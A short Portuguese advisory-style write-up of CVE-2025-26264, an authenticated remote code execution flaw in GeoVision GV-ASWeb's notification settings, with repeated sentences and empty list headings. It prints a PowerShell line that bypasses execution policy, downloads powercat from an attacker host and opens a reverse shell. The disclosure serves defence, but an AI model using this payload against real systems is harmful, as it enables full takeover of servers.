
CVE-2025-26264 - GeoVision GV-ASWeb com a versão 6.1.2.0 ou inferior contém uma vulnerabilidade de Execução Remota de Código (RCE) no recurso de Configurações de Notificação. Um atacante autenticado com privilégios de "Configurações do Sistema" no ASWeb pode explorar essa falha para executar comandos arbitrários no servidor, levando a um comprometimento total do sistema.
CVE-2025-26264 - GeoVision GV-ASWeb com versão 6.1.2.0 ou inferior, contém uma vulnerabilidade de Execução Remota de Código (RCE) no recurso Notification Settings. Um atacante autenticado com privilégios de "System Settings" no ASWeb pode explorar essa falha para executar comandos arbitrários no servidor, levando a um comprometimento total do sistema.
Para realizar um ataque com sucesso, o atacante requer:
A vulnerabilidade pode ser explorada para realizar as seguintes ações não autorizadas:
Explorar a vulnerabilidade de Execução Remota de Código na plataforma ASWeb do GeoVision GV-ASManager é possível em versões 6.1.2.0 ou inferiores (não há correção até 26 de fevereiro de 2025).
A função Notification Setting do ASWeb do GeoVision ASManager está vulnerável a RCE
Requisição HTTP de configuração de uma notificação em um evento específico: falha na tentativa de login do TAWeb
De acordo com este script, se houver uma tentativa de login TAWeb falha, o seguinte script PowerShell será executado:
powershell.exe Set-ExecutionPolicy Bypass -Force;IEX(New-Object System.Net.WebClient).DownloadString('http://LHOST/powercat.ps1');powercat -c LHOST -p LPORT -e powershell
Uma tentativa falha de autenticação no TAWeb
Máquina da vítima: O script abre uma backdoor para a máquina do atacante.
Máquina do atacante: O atacante obtém o shell
Se você tiver alguma dúvida, pode entrar em contato comigo, Giorgi Dograshvili, no LinkedIn.